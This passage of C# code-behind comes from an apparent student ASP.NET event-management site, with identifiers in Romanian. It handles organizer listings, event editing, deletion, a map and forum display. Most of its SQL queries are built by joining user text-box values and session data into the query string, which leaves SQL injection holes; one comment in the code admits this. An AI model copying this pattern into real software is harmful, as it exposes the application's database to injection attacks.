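            object result = cmd.ExecuteScalar(); // null when no such account exists
            sqlConnection1.Close();
            return result == null ? -1 : Convert.ToInt32(result);
        }
    }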
    protected void OrganizatoriInvitati()
    {
SqlCommand cmd = new SqlCommand();
int organizatoriExista = 0;
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"] ;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
organizatoriExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (organizatoriExista != 0)
{
try
{
String query = "SELECT id_organizator,aprobat from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
List<int> idFiecareOrganizator = new List<int>();
List<Boolean> Aprobat = new List<Boolean>();
DataTable Table_ListaOrganizatori = new DataTable();
if (Table_ListaOrganizatori.Columns.Count == 0)
{
Table_ListaOrganizatori.Columns.Add("Account", typeof(string));
Table_ListaOrganizatori.Columns.Add("Status", typeof(string));
}
using (SqlDataReader fiecareOrganizator = cmd.ExecuteReader())
{
while (fiecareOrganizator.Read())
{
idFiecareOrganizator.Add(fiecareOrganizator.GetInt32(fiecareOrganizator.GetOrdinal("id_organizator")));
Aprobat.Add(fiecareOrganizator.GetBoolean(fiecareOrganizator.GetOrdinal("aprobat")));
}
fiecareOrganizator.Close();
}
                // for each id, fetch the username and display it next to its current status
for(int id = 0; id < idFiecareOrganizator.Count; id ++){
query = "SELECT acont from utilizator where id = " + idFiecareOrganizator[id];
cmd.CommandText = query;
                    SqlDataReader fiecareAcont = cmd.ExecuteReader(); // execute the SQL query
fiecareAcont.Read();
                    DataRow NewRow = Table_ListaOrganizatori.NewRow(); // create a new row
NewRow[0] = fiecareAcont.GetString(fiecareAcont.GetOrdinal("acont"));
if(Aprobat[id] == true){
NewRow[1] = "acceptat";
}
else
if (Aprobat[id] == false)
{
NewRow[1] = "pending";
}
                    Table_ListaOrganizatori.Rows.Add(NewRow); // add the new row
fiecareAcont.Close();
}
listaOrganizatoriEvent.DataSource = Table_ListaOrganizatori;
listaOrganizatoriEvent.DataBind();
                int index_organizator = 0; // row index into idFiecareOrganizator
foreach (GridViewRow row in listaOrganizatoriEvent.Rows)
{
int i = 0;
LinkButton elimina = new LinkButton();
                    elimina.ID = "a" + idFiecareOrganizator[index_organizator].ToString(); // each button id embeds the organizer id it refers to
elimina.Text = "Elimina";
elimina.Click += new EventHandler(eliminaOrganizator);
row.Cells[i].Controls.Add(elimina);
index_organizator++;
}
}
catch (Exception ex)
{
MesajEroare.Text += " Nu merge " + ex.Message;
}
sqlConnection1.Close();
}
}
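    // Removes the organizer encoded in the clicked button's ID (the leading "a"
    // marker is stripped before parsing the organizer id).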
protected void eliminaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idOrg = 0;
if (eveniment.Text == "Elimina")
{
idOrg = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"] + " and id_organizator = " + idOrg;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
MesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("OrganizatoriEveniment.aspx");
}
protected void inapoi_Click(object sender, EventArgs e)
{
Response.Redirect("Eveniment.aspx");
}
}<file_sep>/PIP/Eveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI.HtmlControls;
using System.IO;
using System.Data.OleDb;
//----------------------------------------------------------------------------------------
using Subgurim.Controles;
using Subgurim.Controles.GoogleChartIconMaker;
using System.Drawing;
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
public partial class Eveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
SqlConnection sqlConnection2 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool Proprietar = false;
bool Organizator = false;
override protected void OnInit(EventArgs e)
{
InitializeComponent();
base.OnInit(e);
}
private void InitializeComponent()
{
this.Load += new System.EventHandler(this.Page_Load);
this.cmdSend.Click += new System.EventHandler(this.cmdSend_Click);
}
protected void Page_Load(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = false;
Label11sterge.Visible = false;
ButtonStergeEvenimentOK.Visible = false;
ButtonStergeEvenimentNO.Visible = false;
PanelParticipanti.Visible = false;
MesajRaspuns.Text = "";
LabelEroareRol.Text = "";
lblInfo.Text = "";
this.ButtonAdaugaRol2.Click += new System.EventHandler(this.ButtonAdaugaRol2_Click);
this.ButtonAfisareParticipanti.Click += new System.EventHandler(this.ButtonAfiseazaParticipanti_Click);
AfiseazaParticipanti();
MesajRaspuns.Text = "";
cmdSend.Visible = false;
lblFile.Visible = false;
filMyFile.Visible = false;
numeEveniment.Visible = false;
descriereEveniment.Visible = false;
ziuaEveniment.Visible = false;
lista_luni.Visible = false;
anEveniment.Visible = false;
lunaEveniment.Visible = false;
oraEveniment.Visible = false;
minutEveniment.Visible = false;
etichetaEveniment.Visible = false;
orasEveniment.Visible = false;
judetEveniment.Visible = false;
taraEveniment.Visible = false;
ButtonEditeazaNume.Visible = false;
ButtonEditeazaEtichete.Visible = false;
ButtonEditeazaDescriere.Visible = false;
ButtonEditeazaData.Visible = false;
ButtonEditeazaOras.Visible = false;
ButtonEditeazaJudet.Visible = false;
ButtonEditeazaTara.Visible = false;
ButtonAdaugaRol2.Visible = false;
LabelDenumire.Visible = false;
LabelDescriere.Visible = false;
LabelMaxUsers.Visible = false;
DenumireRol.Visible = false;
DescriereRol.Visible = false;
MaxUsers.Visible = false;
ButtonSubmitRol2.Visible = false;
ButtonSubmitNume.Visible = false;
ButtonSubmitEtichete.Visible = false;
ButtonSubmitDescriere.Visible = false;
ButtonSubmitData.Visible = false;
ButtonSubmitOras.Visible = false;
ButtonSubmitJudet.Visible = false;
ButtonSubmitTara.Visible = false;
ButtonInvitaOrganizatori.Visible = false;
textbox_latitudine.Visible = false;
textbox_longitudine.Visible = false;
ButtonIntroduceDateLocatie.Visible = false;
VerificareProprietar(sender, e);
if (Session["nume"] == null)
ButtonComentariu.Visible = false;
else ButtonComentariu.Visible = true;
if (Proprietar)
{
ButtonAdaugaRol2.Visible = true;
ButtonEditeazaNume.Visible = true;
ButtonEditeazaEtichete.Visible = true;
ButtonEditeazaDescriere.Visible = true;
ButtonEditeazaData.Visible = true;
ButtonEditeazaOras.Visible = true;
ButtonEditeazaJudet.Visible = true;
ButtonEditeazaTara.Visible = true;
ButtonInvitaOrganizatori.Visible = true;
cmdSend.Visible = true;
lblFile.Visible = true;
filMyFile.Visible = true;
ButtonStergeEveniment.Visible = true;
editareLocatie();
textbox_latitudine.Visible = true;
textbox_longitudine.Visible = true;
ButtonIntroduceDateLocatie.Visible = true;
// ButtonLocatie.Visible = true;
}
else
{
VerificareOrganizator(sender, e);
// MesajRaspuns.Text += "* "+Session["idEvenimentSelectat"]+Session["Id"];
if (Organizator)
{
// MesajRaspuns.Text += "lala";
ButtonAdaugaRol2.Visible = true;
ButtonEditeazaNume.Visible = true;
ButtonEditeazaEtichete.Visible = true;
ButtonEditeazaDescriere.Visible = true;
ButtonEditeazaData.Visible = true;
ButtonEditeazaOras.Visible = true;
ButtonEditeazaJudet.Visible = true;
ButtonEditeazaTara.Visible = true;
ButtonInvitaOrganizatori.Visible = false;
cmdSend.Visible = true;
lblFile.Visible = true;
filMyFile.Visible = true;
}
}
UmplereInformatii(sender, e);
////----------------------------------------------------------------------
afisareHarta();
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Afiseaza_Fisiere();
Afiseaza_Roluri();
Afiseaza_NumarParticipanti();
if (PanelForum.Visible == true)
ButtonForum_Click(sender, e);
}
protected void ButtonIntrebareSterge_Click(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = false;
Label11sterge.Visible = true;
ButtonStergeEvenimentOK.Visible = true;
ButtonStergeEvenimentNO.Visible = true;
}
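    // Deletes the selected event together with its documents (including the files on
    // disk), organizers, participants, forum replies and roles. The statements below
    // run independently; a minimal sketch of making them atomic with a transaction
    // (assuming the single shared connection) would be:
    //   sqlConnection1.Open();
    //   SqlTransaction tx = sqlConnection1.BeginTransaction();
    //   cmd.Connection = sqlConnection1; cmd.Transaction = tx;
    //   ... execute each DELETE ...
    //   tx.Commit(); // or tx.Rollback() in a catch block
    //   sqlConnection1.Close();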
protected void ButtonStergeEveniment_Click(object sender, EventArgs e)
{
string nume;
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
File.Delete(Server.MapPath(nume));
}
}
sqlConnection1.Close();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection1;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "delete from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandType = CommandType.Text;
cmd3.CommandText = "delete from organizeaza where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd3.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandType = CommandType.Text;
cmd4.CommandText = "delete from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd4.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandType = CommandType.Text;
cmd5.CommandText = "delete from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd5.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd6 = new SqlCommand();
cmd6.Connection = sqlConnection1;
cmd6.CommandType = CommandType.Text;
cmd6.CommandText = "delete from roluri where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd6.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd7 = new SqlCommand();
cmd7.Connection = sqlConnection1;
cmd7.CommandType = CommandType.Text;
cmd7.CommandText = "delete from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd7.ExecuteNonQuery();
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void ButtonIntrebareReturn_Click(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = true;
Label11sterge.Visible = false;
ButtonStergeEvenimentOK.Visible = false;
ButtonStergeEvenimentNO.Visible = false;
}
protected void UmplereInformatii(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
sqlConnection1.Open();
cmd.CommandText = "select nume+' '+prenume from utilizator where id=(select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ");";
cmd.CommandType = CommandType.Text;
proprietarLabel.Text = cmd.ExecuteScalar().ToString();
cmd.CommandText = "select * from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
numeEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("nume"));
if (Convert.IsDBNull(SRD["data_inceperii"]))
{
ziuaEvenimentLabel.Text = "";
anEvenimentLabel.Text = "";
lunaEvenimentLabel.Text = "";
oraEvenimentLabel.Text = "";
minutEvenimentLabel.Text = "";
}
else
{
ziuaEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Day).ToString();
anEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Year).ToString();
lunaEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Month).ToString();
oraEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Hour).ToString();
minutEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Minute).ToString();
}
// etichetaEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("etichete"));
if (Convert.IsDBNull(SRD["descriere"]))
{
descriereEvenimentLabel.Text = "Nu este stabilita.";
}
else
{
descriereEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("descriere"));
}
if (Convert.IsDBNull(SRD["oras"]))
{
orasEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
orasEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("oras"));
}
if (Convert.IsDBNull(SRD["judet"]))
{
judetEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
judetEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("judet"));
}
if (Convert.IsDBNull(SRD["tara"]))
{
taraEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
taraEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("tara"));
}
}
}
sqlConnection1.Close();
}
//----------------------------------------------------------------------------------
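    // Renders the event location with the Subgurim GoogleMaps control: reads the
    // stored latitude/longitude for the selected event, drops a single marker with
    // an info window, and hides the map when no location row exists.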
private void afisareHarta()
{ /*
double lat = 45.662943, longi = 25.612564;
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitudine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
lat = SRD.GetDouble(SRD.GetOrdinal("latitudine"));
longi = SRD.GetDouble(SRD.GetOrdinal("longitudine"));
}
}
}
}
catch (Exception)
{
MesajRaspuns.Text = "eroareeeeeeeeeeeee";
}
sqlConnection1.Close();
GMap1.Key = "gmapkey_localhost";
GMarker marker = new GMarker(new GLatLng(39.5, -3.2));
GInfoWindow window = new GInfoWindow(marker, "<center><b>GoogleMaps.Subgurim.NET</b></center>", true);
GMap1.addInfoWindow(window);
*/
/*
GMap1.setCenter(new GLatLng(41, 3), 3);
GMap1.Add(new GControl(GControl.preBuilt.LargeMapControl));
GMarker m1 = new GMarker(new GLatLng(41, 3));
MarkerManager mManager = new MarkerManager();
mManager.Add(m1, 2);
List<GMarker> mks = new List<GMarker>();
List<GInfoWindow> iws = new List<GInfoWindow>();
Random r = new Random();
double ir1, ir2;
GMarker mkr;
for (int i = 0; i < 10; i++)
{
ir1 = (double)r.Next(40) / 10.0 - 2.0;
ir2 = (double)r.Next(40) / 10.0 - 2.0;
mkr = new GMarker(m1.point + new GLatLng(ir1, ir2));
mks.Add(mkr);
GMap1.Add(new GListener(mkr.ID, GListener.Event.click, "function(){alert('" + i + "');}"));
}
for (int i = 0; i < 5; i++)
{
ir1 = (double)r.Next(40) / 20.0 - 1;
ir2 = (double)r.Next(40) / 20.0 - 1;
mkr = new GMarker(m1.point + new GLatLng(ir1, ir2));
GInfoWindow window = new GInfoWindow(mkr, i.ToString());
iws.Add(window);
}
mManager.Add(mks, 6, 8);
mManager.Add(iws, 7, 8);
GMap1.markerManager = mManager;
*/
string skey = "<KEY>";
GMap1.Key = skey;
GMap1.addControl(new GControl(GControl.preBuilt.GOverviewMapControl));
GMap1.addControl(new GControl(GControl.preBuilt.LargeMapControl));
double lat = 45.662943, longi = 25.612564;
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
// MesajRaspuns.Text = "2";
lat = (SRD.GetDouble(0));
longi = (SRD.GetDouble(1));
// MesajRaspuns.Text += "3";
}
}
GMarker marker = new GMarker(new GLatLng(lat, longi));
//creating pushpin window with content
GInfoWindow window = new GInfoWindow(marker, "<center><b></b></center>", true);
//creating new marker for second location
GMarker marker1 = new GMarker(new GLatLng(16.3, 79.4));
//creating second pushpin window
// GInfoWindow windo1 = new GInfoWindow(marker1, "<center><b>Loyapalli, India </b></center>", true);
//adding windows in GMap control
GMap1.addInfoWindow(window);
// GMap1.addInfoWindow(windo1);
}
else
{
GMap1.Visible = false;
}
}
catch (Exception ex)
{
MesajRaspuns.Text += "eroareeeeeeeeeeeee in afisare harta " + ex.Message;
}
sqlConnection1.Close();
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
private void VerificareProprietar(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_prop = 0;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Id_prop = SRD.GetInt32(SRD.GetOrdinal("id_proprietar"));
}
}
sqlConnection1.Close();
if (Id_prop == Id_curent)
Proprietar = true;
}
}
private void VerificareOrganizator(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_organizator = 0;
// MesajRaspuns.Text += "&";
try
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
// MesajRaspuns.Text += "1";
cmd.CommandText = "select id_organizator from organizeaza where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_organizator = " + Session["Id"] + " and aprobat=1;";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
// MesajRaspuns.Text += "2-";
Id_organizator = SRD.GetInt32(SRD.GetOrdinal("id_organizator"));
// MesajRaspuns.Text += "3-";
}
}
}
catch (Exception ex)
{
MesajRaspuns.Text += " " + ex.Message;
}
sqlConnection1.Close();
// MesajRaspuns.Text += Id_organizator + " = " + Id_curent;
if (Id_organizator == Id_curent)
Organizator = true;
}
}
protected void ButtonEditeazaNume_Click(object Sender, EventArgs e)
{
numeEveniment.Visible = true;
ButtonSubmitNume.Visible = true;
ButtonEditeazaNume.Visible = false;
numeEveniment.Text = numeEvenimentLabel.Text;
}
protected void ButtonEditeazaData_Click(object Sender, EventArgs e)
{
ziuaEveniment.Visible = true;
lista_luni.Visible = true;
anEveniment.Visible = true;
oraEveniment.Visible = true;
minutEveniment.Visible = true;
ButtonSubmitData.Visible = true;
ButtonEditeazaData.Visible = false;
ziuaEveniment.Text = ziuaEvenimentLabel.Text;
anEveniment.Text = anEvenimentLabel.Text;
oraEveniment.Text = oraEvenimentLabel.Text;
minutEveniment.Text = minutEvenimentLabel.Text;
}
protected void ButtonEditeazaDescriere_Click(object Sender, EventArgs e)
{
descriereEveniment.Visible = true;
ButtonSubmitDescriere.Visible = true;
ButtonEditeazaDescriere.Visible = false;
descriereEveniment.Text = descriereEvenimentLabel.Text;
}
protected void ButtonEditeazaEtichete_Click(object Sender, EventArgs e)
{
etichetaEveniment.Visible = true;
ButtonSubmitEtichete.Visible = true;
ButtonEditeazaEtichete.Visible = false;
etichetaEveniment.Text = etichetaEvenimentLabel.Text;
}
protected void ButtonEditeazaOras_Click(object Sender, EventArgs e)
{
orasEveniment.Visible = true;
ButtonSubmitOras.Visible = true;
ButtonEditeazaOras.Visible = false;
orasEveniment.Text = orasEvenimentLabel.Text;
}
protected void ButtonEditeazaJudet_Click(object Sender, EventArgs e)
{
judetEveniment.Visible = true;
ButtonSubmitJudet.Visible = true;
ButtonEditeazaJudet.Visible = false;
judetEveniment.Text = judetEvenimentLabel.Text;
}
protected void ButtonEditeazaTara_Click(object Sender, EventArgs e)
{
taraEveniment.Visible = true;
ButtonSubmitTara.Visible = true;
ButtonEditeazaTara.Visible = false;
taraEveniment.Text = taraEvenimentLabel.Text;
}
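    // NOTE: the update handlers below interpolate user text straight into SQL; see
    // the parameterized-command sketch in OrganizatoriEveniment.aspx.cs for a safer
    // pattern.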
protected void ButtonSubmitNume_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set nume='" + numeEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (numeEveniment.Text != "")
{
cmd.ExecuteNonQuery();
numeEvenimentLabel.Text = numeEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitData_Click(object Sender, EventArgs e)
{
int zi = DateTime.Now.Day, luna = DateTime.Now.Month, an = DateTime.Now.Year, ora = DateTime.Now.Hour, minut = DateTime.Now.Minute;
if (Int32.TryParse(oraEveniment.Text, out ora) == false)
{
MesajRaspuns.Text = "Introduceti o ora numar intreg";
return;
}
else
{
if (ora > 23 || ora < 0)
{
MesajRaspuns.Text = "Introduceti o ora numar intreg intre 0 si 23 ";
return;
}
}
if (Int32.TryParse(minutEveniment.Text, out minut) == false)
{
MesajRaspuns.Text = "Introduceti un minut numar intreg";
return;
}
else
{
            if (minut > 59 || minut < 0)
{
MesajRaspuns.Text = "Introduceti un minut numar intreg intre 0 si 59 ";
return;
}
}
if (Int32.TryParse(anEveniment.Text, out an) == false)
{
MesajRaspuns.Text = "Introduceti un an numar intreg";
return;
}
else
{
if (an < DateTime.Now.Year || an > 3000)
{
MesajRaspuns.Text = "Introduceti un an numar intreg intre " + DateTime.Now.Year + " si 3000 ";
return;
}
}
luna = lista_luni.SelectedIndex + 1;
        if (Int32.TryParse(ziuaEveniment.Text, out zi) == false)
        {
            MesajRaspuns.Text = "Introduceti o zi numar intreg";
            return;
        }
        else
        {
            // DateTime.DaysInMonth accounts for month lengths and leap years.
            int zileInLuna = DateTime.DaysInMonth(an, luna);
            if (zi < 1 || zi > zileInLuna)
            {
                MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si " + zileInLuna + " ";
                return;
            }
        }
        DateTime data = DateTime.Now;
        // month.day.year hour:minute; Convert.ToDateTime below parses it with the current culture
        string dataString = luna + "." + zi + "." + an + " " + ora + ":" + minut;
try
{
data = Convert.ToDateTime(dataString);
}
catch (Exception ex)
{
MesajRaspuns.Text += ex.Message;
}
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set data_inceperii='" + data + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
try
{
cmd.ExecuteNonQuery();
ziuaEvenimentLabel.Text = zi.ToString();
lunaEvenimentLabel.Text = luna.ToString();
anEvenimentLabel.Text = an.ToString();
oraEvenimentLabel.Text = ora.ToString();
minutEvenimentLabel.Text = minut.ToString();
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
catch (Exception ex)
{
MesajRaspuns.Text = ex.Message;
}
sqlConnection1.Close();
}
protected void ButtonSubmitDescriere_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set descriere='" + descriereEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (descriereEveniment.Text != "")
{
cmd.ExecuteNonQuery();
descriereEvenimentLabel.Text = descriereEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else
MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitEtichete_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set etichete='" + etichetaEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (etichetaEveniment.Text != "")
{
cmd.ExecuteNonQuery();
etichetaEvenimentLabel.Text = etichetaEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitOras_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set oras='" + orasEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (orasEveniment.Text != "")
{
cmd.ExecuteNonQuery();
orasEvenimentLabel.Text = orasEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitJudet_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set judet='" + judetEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (judetEveniment.Text != "")
{
cmd.ExecuteNonQuery();
judetEvenimentLabel.Text = judetEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitTara_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set tara='" + taraEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (taraEveniment.Text != "")
{
cmd.ExecuteNonQuery();
taraEvenimentLabel.Text = taraEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButonInvitaOrganizatori_Click(object sender, EventArgs e)
{
Response.Redirect("OrganizatoriEveniment.aspx");
}
protected void ButtonInformatii_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = true;
PanelInscriere.Visible = false;
PanelResurse.Visible = false;
PanelForum.Visible = false;
}
protected void ButtonInscriere_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = false;
PanelInscriere.Visible = true;
PanelResurse.Visible = false;
PanelForum.Visible = false;
}
protected void ButtonResurse_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = false;
PanelInscriere.Visible = false;
PanelResurse.Visible = true;
PanelForum.Visible = false;
}
protected void ButtonForum_Click(object sender, EventArgs e)
{
// if (PanelForum.Visible == true) PanelComentarii.Controls.Clear();
// if (PanelComentarii.Controls.Count > 0) return;
PanelInformatii.Visible = false;
PanelInscriere.Visible = false;
PanelResurse.Visible = false;
PanelForum.Visible = true;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_parinte=-1 order by data desc;";
cmd.CommandType = CommandType.Text;
if ((PanelComentarii.FindControl("kid")) == null)
{
Label k = new Label();
k.Text = "Comentarii:";
k.ID = "kid";
PanelComentarii.Controls.Add(k);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
}
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
TextBox t2 = new TextBox();
t2.ID = "Comentariu" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
